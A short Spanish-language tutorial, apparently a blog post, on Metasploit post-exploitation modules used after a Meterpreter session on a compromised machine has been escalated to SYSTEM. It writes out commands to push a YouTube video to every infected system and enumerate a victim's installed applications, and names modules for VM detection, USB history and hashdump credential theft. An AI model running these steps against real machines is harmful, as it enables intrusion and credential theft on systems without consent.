Post modulos-metasploit

Metasploit tiene una amplia gama de módulos de la explotación después de la que se puede ejecutar en los objetivos comprometidos para reunir pruebas, el pivote más en una red de destino, y mucho más.


Primero hay que tener meterpreter en la maquina comprometida ,yo le subo privilegios como system para evitar errores ,colocamos el comando de background para que nos guarde nuestra sesión de meterpreter y retrocedemos con el comando de back para utilizar los post modulos de metasploit.

voy a usar dos post modulos , uno de ellos lo que hace es trasmitir un video de youtube a todos los sistemas que tengo infectados .se podra ver los videos en el navegador predeterminado y con la ventana maximizada , donde dice VID ponemos el id del video.

msf use post/multi/manage/play_youtube
msf exploit (play_youtube)>set VID 
msf exploit (play_youtube)>set session 1  
msf exploit (play_youtube)>exploit


El segundo nos muestra las aplicaciones que estan instaladas y las vesiones  de la  pc victima .

msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1

msf post(enum_applications) > exploit


Hay otros post modulos que son de gran ayuda como....

use post/windows/gather/checkvm:
verifica si la pc infectada es una maquina virtual o no.


use post/windows/gather/hashdump:
Mostrara la contraseña del administradoor del sistema.

use post/windows/gather/usb_history

Enumera la historia de la unidad USB.